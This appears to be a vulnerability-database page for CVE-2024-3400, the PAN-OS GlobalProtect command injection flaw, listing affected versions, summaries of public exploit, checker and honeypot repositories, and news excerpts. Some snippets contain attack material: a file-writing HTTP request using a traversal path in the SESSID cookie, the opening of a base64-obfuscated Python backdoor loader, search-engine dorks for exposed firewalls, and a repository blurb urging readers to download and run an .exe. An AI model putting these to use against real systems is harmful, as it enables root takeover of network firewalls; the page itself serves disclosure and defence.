Published: 12/04/2024 Updated: 23/04/2024

CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9

VMScore: 0

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated malicious user to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Vulnerable Product	Search on Vulmon	Subscribe to Product
paloaltonetworks pan-os 10.2.7
paloaltonetworks pan-os 10.2.2
paloaltonetworks pan-os 10.2.6
paloaltonetworks pan-os 10.2.5
paloaltonetworks pan-os 10.2.3
paloaltonetworks pan-os 10.2.4
paloaltonetworks pan-os 10.2.1
paloaltonetworks pan-os 10.2.0
paloaltonetworks pan-os 10.2.9
paloaltonetworks pan-os 11.1.1
paloaltonetworks pan-os 11.0.2
paloaltonetworks pan-os 11.1.0
paloaltonetworks pan-os 11.1.2
paloaltonetworks pan-os 11.0.4
paloaltonetworks pan-os 11.0.3
paloaltonetworks pan-os 11.0.0
paloaltonetworks pan-os 11.0.1

Check Point Reference: CPAI-2024-0196 Date Published: 14 Apr 2024 Severity: Critical ...

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway ...

Properties Threat Severity High ...

Critical Infrastructure Sectors: Critical Manufacturing

Palo Alto OS was recently hit by a command injection zero day attack These are exploitation details related to the zero day ...

This Metasploit module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default) Multiple versions are affected ...

Palo Alto PAN-OS versions prior to 1112-h3 command injection and arbitrary file creation exploit ...

Global Protec Palo Alto File Write Exploit

CVE-2024-3400 CVE-2024-3400 Palo Alto File Write Exploit /gp-exploitsh file_name_to_write urlstxt

PAN-OS Firewall Exploit Script This script is designed to demonstrate the exploitation of vulnerabilities in PAN-OS firewalls It sends a specially crafted payload to the firewall's API endpoint to execute arbitrary commands This exploit specifically targets CVE-2024-3400, a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software

CVE-2024-3400-PoC

CVE-2024-3400: OS Command Injection Vulnerability in GlobalProtect Gateway Severity: CRITICAL (10/10) ⚠️

A simple bash script to check for evidence of compromise related to CVE-2024-3400

CVE-2024-3400_compromise_checker A simple bash script to check for evidence of compromise related to CVE-2024-3400

CVE-2024-3400 import os,base64,time systempth = "/usr/lib/python36/site-packages/systempth" with open(systempth,'wb') as f: fwrite(b'''import base64;exec(base64b64decode(b"CgoKZGVmIGNoZWNrKCk6CiAgICBpbXBvcnQgb3Msc3VicHJvY2Vzcyx0aW1lLHN5cwoKCiAgICBkZWYgc3RhcnRfcHJvY2VzcygpOgogICAgICAgIGltcG9ydCBiYXNlNjQKICAgICAgICBmdW5jdGlvbmNvZGUg

A simple bash script to check for evidence of compromise related to CVE-2024-3400

CVE-2024-3400 Compromise Checker A very simple bash script to check for evidence of compromise related to CVE-2024-3400 on Palo Alto Firewalls Designed to provide a quick initial triage of potentially impacted devices by checking for the existence of artefacts outlined in the Volexity writeup and deFroggy's blog post Usage: /cve-2024-3400_checkersh For more detailed in

CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software

CVE-2024-3400-POC CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software Date of published 2024/04/12 🔥 CVSS: 98/10 Description A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbit

CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software

CVE-2024-3400 Checker

CVE-2024-3400 Vulnerability Checker Description CVE-2024-3400 represents a critical command injection vulnerability in several versions of PAN-OS, the operating system for Palo Alto Networks firewalls This vulnerability, rated CVSS 10, allows unauthenticated attackers to execute arbitrary code with root privileges It affects PAN-OS versions 102, 110, and 111 under specific

repository containing some nmap scripts

nmap-scripts repository containing some nmap scripts download the script to the script folder "C:\Program Files (x86)\Nmap/scripts/" on Windows or /usr/share/nmap/scripts/ on some Linux don't forget to update the db if you want the script to be registered as exploit category for example nmap --script-updatedb CVE-2024-3400 PANOS - GloablProtect RCE Testing ETag v

CVE-2024-3400 This script is a simple tool for exploiting vulnerable PAN-OS firewalls It allows users to perform attacks against vulnerable PAN-OS firewalls by injecting custom payloads into them The script can be run by entering values directly or by using a CSV file containing a list of targets Usage: Running the Script with Direct Values: Make sure you have Python 3x in

Vulnerabilidad de palo alto

Vulnerabilidad CVE-2024-3400 Descripción La vulnerabilidad CVE-2024-3400 es una vulnerabilidad de seguridad que afecta a los cortafuegos PAN-OS en las versiones 102, 110 y 111 Esta vulnerabilidad se explota cuando las configuraciones de puerta de enlace GlobalProtect y telemetría de dispositivos están activadas Un atacante puede aprovechar esta vulnera

CVE-2024-3400 POC Remote Code Execution (RCE) Palo Alto Networks PAN-OS software

A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability.

CVE-2024-3400-Checker A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability

CVE-2024-3400-RCE

CVE-2024-3400 CVE-2024-3400

CVE-2024-3400

CVE-2024-3400 CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

CVE-2024-3400 CVE-2024-3400 Palo Alto OS Command Injection send this HTTP request: POST /ssl-vpn/hipreportesp HTTP/11 Host: 127001 Cookie: SESSID=////var/appweb/sslvpndocs/global-protect/portal/images/hellome1337txt; Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 you will create hellome1337

CVE-2024-3400 RCE Test Script Overview This Python script is designed to test for a remote code execution (RCE) vulnerability, specifically CVE-2024-3400, which affects certain Palo Alto Networks GlobalProtect portals The vulnerability allows unauthorized command execution via cookie manipulation The script sends a benign HTTP GET request to a list of specified URLs with a co

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

CVE-2024-3400 CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

CVE-2024-3400-RCE

根据githubcom/W01fh4cker/CVE-2024-3400-RCE 简单修改批量rce测试参考 labswatchtowrcom/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ 仅供测试违法测试与本人无关

Have we not learnt from HoneyPoC?

CVE-2024-3400-Canary Have we not learnt from HoneyPoC? Usage Point script at host: python3 Pocpy <host>

Simple POC for CVE-2024-3400

cve-2024-3400-poc Simple POC for CVE-2024-3400 based on the article labswatchtowrcom/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

CVE-2024-3400 : Palo Alto OS Command Injection - POC

CVE-2024-3400 CVE-2024-3400 : Palo Alto OS Command Injection - POC Disclamer This is just a POC - I've decided not to include the exploit in this repository

Simple Python code to check for arbitrary uploading

CVE-2024-3400 Simple Python code to check for arbitrary uploading

Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts

Firewall CVE-2024-3400 Checker Overview This script checks for evidence of the CVE-2024-3400 PAN-OS exploit on Palo Alto Networks firewalls Requirements Python 36+ netmiko library tqdm library Installation Clone the repository: git clone githubcom/swaybs/CVE-2024-3400git Navigate to the project directory: cd cve-2024-3400 Install the dependencies using pip: pip i

Finding Palo Alto devices vulnerable to CVE-2024-3400.

CVE-2024-3400 Finding Palo Alto devices vulnerable to CVE-2024-3400 options: -h, --help show this help message and exit -r IP, --ip IP IP address for single request -R FILE, --file FILE File path containing list of IP addresses

A Gorilla Session Vulnerable to Path Directory Traversal export SESSION_KEY=gorilla go run escapezoogo Path Directory Traversal curl --cookie "zoo=$PREFIX/tmp" localhost:8080 curl --cookie "zoo=$HOME/" localhost:8080

CVE-2024-3400

CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

CVE-2024-3400 CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect

CVE-2024-3400 POC written in Rust and Python

CVE-2024-3400 CVE-2024-3400 POC written in Rust and Python

Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation

cve-2024-3400 Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation usage: cve-2024-3400py [-h] {exploit,check} CVE-2024-3400 - Palo Alto OS Command Injection positional arguments: {exploit,check} Available modules exploit Exploit module of script check Vulnerability check module of script

Gorilla_Sessions Vulnerability related to cve-2024-3400 The following links below are a compilation of the CVE-2024-3400 vulnerability, supposedly affected by the gorilla/sessions library, which allows a traversal path via the cookie Attached are 2 listings where you can find all the repositories and packages with dependencies on the library Pull request gorilla/sessions Searc

CVE-2024-3400-RCE

Cyberspace Mapping Dork Fofa app="paloalto-GlobalProtect" enfofainfo/result?qbase64=YXBwPSJwYWxvYWx0by1HbG9iYWxQcm90ZWN0Ig%3D%3D Zoomeye app:"Palo Alto Networks firewall httpd" wwwzoomeyehk/searchResult?q=app%3A%22Palo%20Alto%20Networks%20firewall%20httpd%22&a

Exploit for CVE-2024-3400

CVE-2024-3400 Description Simple Python code to check for arbitrary uploading to a PaloAlto Exploit for CVE-2024-3400 Go To Releases And Download The Archive Run The Compressedexe install python pip install -r requirementstxt Simply Run: python3 exploit-Finalpy -i ip Enjoy :D Download githubcom/stronglier/CVE-2024-3400/releases/tag/CVE-2024-3400

Check to see if your Palo Alto firewall has been compromised by running script againt support bundle.

Palo Vulnerability Check - CVE-2024-3400 Overview This script is designed to check for signs of compromise in Palo systems, specifically for the vulnerability identified as CVE-2024-3400 It searches through targz archive files for specific log entries that may indicate a security breach Prerequisites Python 3x Access to the targz file containing Palo logs Usage Ensur

Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability

CVE-2024-3400-pot Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability

Exploit for GlobalProtect CVE-2024-3400

CVE-2024-3400 Exploit for GlobalProtect CVE-2024-3400

22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks

BleepingComputer • Bill Toulas • 19 Apr 2024

22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks By Bill Toulas April 19, 2024 11:27 AM 0 Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection vulnerability that has been actively exploited in attacks since at least March 26, 2024. CVE-2024-3400 is a critical vulnerability impacting specific Palo Alto Networks' PAN-OS versions in the GlobalProtect feature that allows unauth...

BleepingComputer • Sergiu Gatlan • 16 Apr 2024

Exploit released for Palo Alto PAN-OS bug used in attacks, patch now By Sergiu Gatlan April 16, 2024 02:36 PM 0 Exploit code is now available for a maximum severity and actively exploited vulnerability in Palo Alto Networks' PAN-OS firewall software. Tracked as CVE-2024-3400, this security flaw can let unauthenticated threat actors execute arbitrary code as root via command injection in low-complexity attacks on vulnerable PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls if the device telemet...

BleepingComputer • Sergiu Gatlan • 15 Apr 2024

Palo Alto Networks fixes zero-day exploited to backdoor firewalls By Sergiu Gatlan April 15, 2024 08:59 AM 0 Palo Alto Networks has started releasing hotfixes for a zero-day vulnerability that has been actively exploited since March 26th to backdoor PAN-OS firewalls. This maximum severity security flaw (CVE-2024-3400) affects PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls with device telemetry and GlobalProtect (gateway or portal) enabled. Unauthenticated threat actors can exploit it r...

BleepingComputer • Lawrence Abrams • 13 Apr 2024

Palo Alto Networks zero-day exploited since March to backdoor firewalls By Lawrence Abrams April 13, 2024 08:35 AM 0 Suspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26, using the compromised devices to breach internal networks, steal data and credentials. Palo Alto Networks warned yesterday that hackers were actively exploiting an unauthenticated remote code execution vulnerability in its PAN-OS ...

BleepingComputer • Bill Toulas • 12 Apr 2024

Palo Alto Networks warns of PAN-OS firewall zero-day used in attacks By Bill Toulas April 12, 2024 09:28 AM 0 Today, Palo Alto Networks warns that an unpatched critical command injection vulnerability in its PAN-OS firewall is being actively exploited in attacks. "Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability," warns the Palo Alto security bulletin. The flaw, which has been discovered by Volexity and is tracked as CVE-2024-3400, i...

The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Out of the PAN-OS and into the firewall, a Python backdoor this way comes

Palo Alto Networks on Friday issued a critical alert for an under-attack vulnerability in the PAN-OS software used in its firewall-slash-VPN products. The command-injection flaw, with an unwelcome top CVSS severity score of 10 out of 10, may let an unauthenticated attacker execute remote code with root privileges on an affected gateway, which to put it mildly is not ideal. It can, essentially, be exploited to take complete control of equipment and drill into victims' networks. Updates to fully f...

The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Race on to patch as researchers warn of mass exploitation of directory traversal bug

Various infosec researchers have released proof-of-concept (PoC) exploits for the maximum-severity vulnerability in Palo Alto Networks' PAN-OS used in GlobalProtect gateways. The PoCs started rolling out just a day after the vendor began releasing hotfixes for the issue on Monday. Researchers have echoed previous warnings about how easy the vulnerability is to use in attacks, and said that many organizations could be compromised as a result. Cybersecurity biz watchTowr Labs was the first to rele...

Get Started

CVE-2024-3400

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

ICS Advisories

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect